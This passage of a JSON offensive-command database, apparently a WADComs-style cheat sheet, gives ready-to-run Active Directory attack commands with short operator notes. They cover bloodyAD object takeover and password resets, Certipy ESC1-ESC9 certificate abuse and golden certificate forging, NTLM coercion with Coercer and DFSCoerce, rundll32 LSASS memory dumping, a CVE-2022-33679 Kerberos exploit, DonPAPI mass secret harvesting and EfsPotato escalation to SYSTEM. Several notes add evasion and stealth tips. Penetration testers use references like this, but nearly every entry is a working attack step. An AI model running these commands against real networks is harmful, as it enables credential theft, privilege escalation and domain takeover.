victim","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast"],"added":true},{"id":"wadcoms:bloodyAD-SetOwner","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-SetOwner","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Persistence"],"nativeCategory":["PrivEsc","Exploitation","Persistence"],"command":"# Take ownership of the victim object, then grant yourself full control\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set owner victim john\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john","description":"bloodyAD's `set owner` action rewrites the owner field in a target object's security descriptor over LDAP. The object owner has implicit WriteDacl, so seizing ownership of a user, group, or computer lets you subsequently grant yourself GenericAll (see bloodyAD add genericAll) and fully control it. Use it when BloodHound reports WriteOwner over a principal. Pair it with a follow-up DACL write to complete the takeover.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tNew owner: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-SetPassword","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-SetPassword","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Force-reset the password of a user you have write rights over\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set password victim 'NewPassword123!'","description":"bloodyAD's `set password` action performs a targeted password reset on a user or computer object over LDAP(S). It is the exploitation step when you hold GenericAll, User-Force-Change-Password, or WriteAll over a victim principal discovered in BloodHound. Resetting a service account or privileged user password grants immediate takeover, at the cost of locking out the legitimate user, so it is loud. Requires LDAPS (or LDAP with channel binding) on modern DCs for the password write.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-ShadowCredentials","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-ShadowCredentials","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Add a shadow credential (KeyCredentialLink) to the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add shadowCredentials 'DC01$'","description":"bloodyAD's `add shadowCredentials` action appends an attacker-generated key credential to the target's `msDS-KeyCredentialLink` attribute (the Shadow Credentials / Key Trust technique). Requiring only GenericWrite over the victim and an ADCS-enabled PKINIT-capable environment, it lets you authenticate as the target via a certificate and recover its NT hash without changing the account's password, making it far stealthier than a password reset. bloodyAD prints the PFX and follow-up PKINIT command.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: DC01$","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"added":true},{"id":"wadcoms:Certify-ESC1","toolId":"wadcoms:Certify","toolName":"Certify","name":"Certify-ESC1","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"Certify.exe request /ca:dc.test.local\\test-CA /template:ESC1 /altname:administrator","description":"Certify is the Windows/.NET GhostPack tool for enumerating and abusing AD CS from an existing foothold. Its request verb enrolls in a vulnerable template and, for ESC1, uses /altname to set an arbitrary Subject Alternative Name (e.g. Administrator) on the issued certificate. The output PEM is converted to .pfx with openssl and then passed to Rubeus asktgt /certificate for PKINIT. Use this when you already have a Windows beacon and want to stay on-host rather than pivoting to a Linux attacker box with Certipy.\n\nCommand Reference:\n\n\tCA config: dc.test.local\\test-CA\n\n\tTemplate: ESC1\n\n\tImpersonated user: Administrator","mitre":[],"requires":["Shell"],"services":["ADCS"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-Account-Create","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Account-Create","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"certipy account create -u john@test.local -p password123 -dc-ip 10.10.10.1 -user 'WEBSRV01$' -pass 'ComputerPass123!' -dns websrv01.test.local","description":"Certipy account create adds a new computer (or user) object over LDAP when the operator has MachineAccountQuota available or delegated create rights. This is useful for staging RBCD, Shadow Credentials, or ESC-chain victim accounts that the operator fully controls. The subcommand also supports read/update/delete to modify existing objects' attributes (UPN, SPN, DNS hostname). Runs over LDAP, so add -k / -dc-host for Kerberos-only environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew account: WEBSRV01$\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://www.thehacker.recipes/ad/movement/adcs"],"added":true},{"id":"wadcoms:Certipy-Auth-PKINIT","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Auth-PKINIT","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"certipy auth -pfx administrator.pfx -username administrator -domain test.local -dc-ip 10.10.10.1","description":"Certipy auth consumes a certificate/private key pair (.pfx) and performs Kerberos PKINIT pre-authentication to request a TGT for the identity in the certificate. It then uses the U2U/UnPAC-the-hash technique to recover the account's NT hash from the PAC, saving a .ccache and printing the hash. This is the final step of most ADCS escalation chains (ESC1/ESC3/ESC6/shadow creds): turn the issued certificate into a usable TGT and an NT hash for pass-the-hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tPFX file: administrator.pfx\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["PFX"],"services":["Kerberos","ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/kerberos/pkinit"],"added":true},{"id":"wadcoms:Certipy-ESC1","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC1","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'ESC1' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500","description":"ESC1 abuses a certificate template that allows an enrollee to supply an arbitrary Subject Alternative Name (ENROLLEE_SUPPLIES_SUBJECT) and enables Client Authentication EKU, while granting enrollment rights to low-privileged users. Certipy req enrolls against the vulnerable template and sets -upn to Administrator, producing a .pfx that authenticates as the domain admin. Supply -sid with the target's objectSid so the request also survives the 2022 strong certificate mapping (KB5014754) enforcement. Follow up with certipy auth to obtain a TGT and NT hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC3","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC3","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# 1) Obtain an enrollment agent certificate\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'EnrollmentAgent'\n\n# 2) Request a cert on behalf of the Administrator using the agent pfx\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -pfx john.pfx -on-behalf-of 'TEST\\Administrator'","description":"ESC3 abuses a template that grants the Certificate Request Agent (Enrollment Agent) EKU. Certipy first enrolls in the enrollment-agent template to obtain an agent .pfx, then makes a second request against a normal client-auth template (e.g. User) with -on-behalf-of set to a privileged account and -pfx pointing at the agent certificate. The resulting certificate authenticates as the impersonated user. Requires enrollment rights on both the agent template and the target template.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC4","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC4","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Back up the template config, then overwrite it with a default vulnerable (ESC1-like) configuration\ncertipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -save-old\n\n# Now abuse it exactly like ESC1 (see Certipy-ESC1), then restore the original config afterwards:\n# certipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -configuration ESC4.json","description":"ESC4 is a certificate template ACL misconfiguration: the operator has Write/WriteDacl/WriteOwner over a template object. Certipy template with -write-default-configuration overwrites the template's settings with a known ESC1-vulnerable configuration (enrollee-supplied SAN, client-auth EKU, low-priv enrollment), turning any template into an ESC1 path. Use -save-old first to snapshot the original config, exploit ESC1, then restore with -write-configuration <file>.json to reduce footprint. OPSEC: the template change is domain-wide and logged in the config partition.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["ADCS","LDAP"],"references":["https://github.com/ly4k/Certipy","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC6","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC6","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500","description":"ESC6 occurs when the Enterprise CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, which lets any requester embed an arbitrary SAN into a certificate regardless of the template's subject settings. Certipy req can therefore enroll in a standard client-auth template (e.g. User) while supplying -upn Administrator to impersonate a privileged account. Include -sid to satisfy strong certificate mapping. Note that post-May-2022 patched DCs ignore the SAN unless the mapping is present, so ESC6 alone is often mitigated on updated environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC7-ManageCA","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC7-ManageCA","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Grant our user the officer right on the CA\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -add-officer john\n\n# Enable the SubCA template so we can request against it\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -enable-template 'SubCA'\n\n# Request (goes pending), then issue and retrieve as an officer\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'SubCA' -upn administrator@test.local\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -issue-request 785\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -retrieve 785","description":"ESC7 is when a principal holds the ManageCA (or ManageCertificates) right on the Enterprise CA. Certipy ca -add-officer promotes the controlled user to a certificate officer, which lets it approve pending requests. Combined with enabling the built-in SubCA template (-enable-template SubCA), the operator can request a cert that goes pending, then issue it (-issue-request) and retrieve it (-retrieve) as any UPN. This turns CA administrative rights into domain-admin certificate issuance.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local","mitre":[],"requires":["Username","Password"],"services":["ADCS","RPC"],"references":["https://github.com/ly4k/Certipy","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC8-Relay","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC8-Relay","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Credential Access","Execution"],"nativeCategory":["PrivEsc","Credential Access","Exploitation"],"command":"# Start the ADCS HTTP relay targeting the CA web enrollment endpoint\ncertipy relay -target 'http://10.10.10.1' -template 'DomainController'\n\n# In another shell, coerce the DC to authenticate to the listener (10.10.10.2), e.g.\n# coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2","description":"ESC8 abuses the AD CS web enrollment interface (certsrv / certfnsh.asp), which accepts NTLM authentication and is not protected by channel binding or EPA by default. Certipy relay stands up an HTTP-to-ADCS relay server; once a privileged machine account (e.g. a domain controller) is coerced into authenticating (PetitPotam/Coercer), the relay requests a certificate from the DomainController template on its behalf. The resulting .pfx authenticates as the coerced machine. Certipy relay is the modern replacement for ntlmrelayx.py -t http://<ca>/certsrv/certfnsh.asp --adcs.\n\nCommand Reference:\n\n\tCA / web enrollment host IP: 10.10.10.1\n\n\tAttacker/Listener IP: 10.10.10.2","mitre":[],"requires":["No_Creds"],"services":["ADCS","NTLM"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC9-NoSecurityExtension","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC9-NoSecurityExtension","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Point the controlled victim's UPN at the target admin (no @domain, so it maps by name)\ncertipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn administrator\n\n# Enroll/authenticate as victim (now mapping to administrator), then restore:\n# certipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn victim@test.local","description":"ESC9/ESC10 abuse weak certificate mapping. When a template has CT_FLAG_NO_SECURITY_EXTENSION (ESC9) or the DC uses weak UPN/SPN mapping (ESC10), an attacker with write access over a victim account can change its userPrincipalName to a target admin's value, enroll a certificate as the victim, then authenticate as the admin because the cert has no SID binding. Certipy account update rewrites the victim's -upn over LDAP; revert it afterwards. This chains with certipy shadow (to enroll as the victim) and certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: victim\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-Find-Vulnerable","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Find-Vulnerable","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"certipy find -u john@test.local -p password123 -dc-ip 10.10.10.1 -vulnerable -stdout","description":"Certipy's find command enumerates the AD Certificate Services environment over LDAP and RPC, collecting Enterprise CAs, published certificate templates, and their security descriptors. The -vulnerable flag filters the output to only templates and CA settings that match a known ESC misconfiguration (ESC1-ESC16), and -stdout prints a readable report to the console instead of writing BloodHound/JSON/text files. Run this first with any domain foothold to map which escalation path is available before requesting a certificate.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["ADCS","LDAP"],"references":["https://github.com/ly4k/Certipy","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation","https://www.thehacker.recipes/ad/movement/adcs/certificate-templates"],"added":true},{"id":"wadcoms:Certipy-Forge-GoldenCert","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Forge-GoldenCert","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"certipy forge -ca-pfx test-CA.pfx -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500 -out administrator_forged.pfx","description":"A 'golden certificate' is forged offline once the operator has extracted the Enterprise CA's own certificate and private key (via certipy ca -backup or ESC7, output as a .pfx). Certipy forge signs a brand-new certificate for any UPN with that CA key, so it is trusted by every DC in the forest. Because it never touches the CA and needs no enrollment, it is a durable persistence primitive that survives the target user's password resets. Include -sid to satisfy strong certificate mapping. Feed the forged .pfx to certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tCA private key (PFX): test-CA.pfx\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["PFX"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ShadowCredentials","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ShadowCredentials","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Privilege Escalation"],"nativeCategory":["Credential Access","PrivEsc"],"command":"certipy shadow auto -u john@test.local -p password123 -dc-ip 10.10.10.1 -account victim","description":"Shadow Credentials abuse write access to a target's msDS-KeyCredentialLink attribute (Key Trust). Certipy shadow auto adds an attacker-controlled key credential to the target account over LDAP, uses it to obtain a certificate via PKINIT, recovers the account's NT hash, and then removes the key credential to clean up automatically. Requires GenericWrite/GenericAll (or equivalent) over the target and a KDC that supports PKINIT. Preferred over PyWhisker when you want the full add-authenticate-restore chain in one step.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget account: victim\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos","ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"added":true},{"id":"wadcoms:Coercer-Coerce","toolId":"wadcoms:Coercer","toolName":"Coercer","name":"Coercer-Coerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2","description":"Coercer is a multi-protocol authentication coercion tool that automatically walks through every known RPC coercion method (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, MS-EVEN and more) against a target and triggers the machine account to authenticate back to an attacker-controlled listener. The 'coerce' mode fires all applicable methods, making it the fastest way to obtain a machine-account NTLM authentication to feed into ntlmrelayx or krbrelayx. Requires a valid domain account by default and works well when you do not yet know which specific coercion vector (PrinterBug, PetitPotam, DFSCoerce, ShadowCoerce) is exposed. OPSEC: it is noisy, hitting many named pipes in one run.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/p0dalirius/Coercer","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/"],"added":true},{"id":"wadcoms:Coercer-Scan","toolId":"wadcoms:Coercer","toolName":"Coercer","name":"Coercer-Scan","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Coercer scan -u john -p password123 -d test.local -t 10.10.10.1","description":"Coercer's 'scan' mode enumerates which RPC coercion methods and named pipes are reachable on a target without actually completing an authentication relay, letting an operator map the exposed attack surface (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, etc.) before choosing a vector. Use it as reconnaissance to confirm a host is vulnerable and to pick the quietest single method rather than blasting all of them with coerce. Typically run with a valid domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/p0dalirius/Coercer","https://podalirius.net/en/articles/coercer-an-automatic-authentication-coercion-tool/"],"added":true},{"id":"wadcoms:Comsvcs-MiniDump-LSASS","toolId":"wadcoms:Comsvcs","toolName":"Comsvcs","name":"Comsvcs-MiniDump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Get the LSASS PID first: tasklist /fi \"imagename eq lsass.exe\"\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <lsass_pid> C:\\Windows\\Temp\\lsass.dmp full","description":"The built-in comsvcs.dll exports a MiniDump function that rundll32 can call to write a full memory dump of any process by PID, making it a living-off-the-land LSASS dumper that needs no dropped tooling. Supply the LSASS PID (find it with tasklist or Get-Process lsass), an output path, and the 'full' flag for a complete dump. It requires SYSTEM (or admin + SeDebugPrivilege); the dump is then parsed offline with pypykatz or Mimikatz. This technique is well-signatured, so treat it as noisy.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp\n\n\tLSASS PID: <lsass_pid>","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://lolbas-project.github.io/lolbas/Libraries/comsvcs/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:CVE-2022-33679-Downgrade","toolId":"wadcoms:CVE","toolName":"CVE","name":"CVE-2022-33679 Kerberos RC4-MD4 Downgrade","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"# target = domain/username (AS-REP-roastable account), serverName = DC FQDN\npython3 CVE-2022-33679.py test.local/john dc.test.local -dc-ip 10.10.10.1\n\n# Use the recovered ticket\nexport KRB5CCNAME=john_dc.ccache","description":"CVE-2022-33679 is an unauthenticated Kerberos encryption-downgrade attack: the KDC returns AS-REP material encrypted with the legacy RC4-MD4 (etype 24) cipher for an account, and a known-plaintext weakness lets the attacker brute-force the ephemeral session key and forge a usable TGT. Bdenneu's standalone exploit targets a domain account that has 'Do not require Kerberos pre-authentication' set and an RC4 key, needing only the victim's username (no password). It writes the recovered TGT to a ccache named <user>_<server>.ccache, which can then be used for unauthenticated Kerberoasting or further access.\n\nCommand Reference:\n\n\tTarget (domain/user): test.local/john\n\n\tDC host: dc.test.local\n\n\tDC IP: 10.10.10.1\n\n\tOutput: out.ccache","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/Bdenneu/CVE-2022-33679","https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html","https://horizon3.ai/attack-research/attack-blogs/from-cve-2022-33679-to-unauthenticated-kerberoasting/"],"added":true},{"id":"wadcoms:DFSCoerce","toolId":"wadcoms:DFSCoerce","toolName":"DFSCoerce","name":"DFSCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dfscoerce.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1","description":"DFSCoerce abuses the MS-DFSNM (Distributed File System Namespace Management) RPC interface exposed on a Domain Controller (via the \\PIPE\\netdfs named pipe) to coerce the DC machine account into authenticating to an attacker-controlled host. Because the vulnerable interface lives on the DC itself, it is a reliable path to relay the DC$ authentication to ADCS or LDAP for a domain takeover. The listener is passed first, the target DC second, mirroring PetitPotam's argument order. A valid low-privileged domain account is normally required.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/Wh04m1001/DFSCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-dfsnm"],"added":true},{"id":"wadcoms:DonPAPI-Collect","toolId":"wadcoms:DonPAPI","toolName":"DonPAPI","name":"DonPAPI-Collect","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"# Mass DPAPI harvest against a host (or CIDR / target file), fetching the domain backup key\ndonpapi collect -u john -p password123 -d test.local -t 10.10.10.1 --fetch-pvk\n\n# Browse the collected loot afterward\ndonpapi gui","description":"DonPAPI (login-securite) mass-harvests DPAPI-protected secrets across a set of Windows hosts from Linux without dropping a binary: it remotely reads and decrypts credential blobs, saved browser passwords and cookies, Wi-Fi keys, scheduled task and vault credentials, and certificates. The collect subcommand takes standard NetExec-style auth (-u/-p, -H for hashes, -k/--aesKey for Kerberos) and a -t target list; --fetch-pvk grabs the domain backup key so user masterkeys decrypt automatically. Results land in a local database browsable afterward with donpapi gui. Requires local admin on each target and is loud at scale, so scope the target list carefully.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/login-securite/DonPAPI","https://www.login-securite.com/2022/03/28/donpapi/"],"added":true},{"id":"wadcoms:EfsPotato-SeImpersonate","toolId":"wadcoms:EfsPotato","toolName":"EfsPotato","name":"EfsPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Compile on the target with the bundled .NET compiler\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /nowarn:1691,618 /out:EfsPotato.exe EfsPotato.cs\n\n# Run a command as SYSTEM (optional 2nd arg picks the named pipe)\nEfsPotato.exe \"whoami\"\nEfsPotato.exe \"whoami\" 2","description":"EfsPotato abuses the MS-EFSRPC (Encrypting File System Remote) interface to coerce the local SYSTEM account to authenticate over a named pipe, then impersonates the token to run a command as SYSTEM. It is a single self-contained source file typically compiled on the target with csc.exe, which helps evade AV signatures on prebuilt potato binaries. The optional second argument selects the named pipe (1=lsarpc, 2=efsrpc, 3=samr, 4=lsass, 5=netlogon) to dodge partial MS-EFSRPC patches. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tPipe selector (optional): 2 = 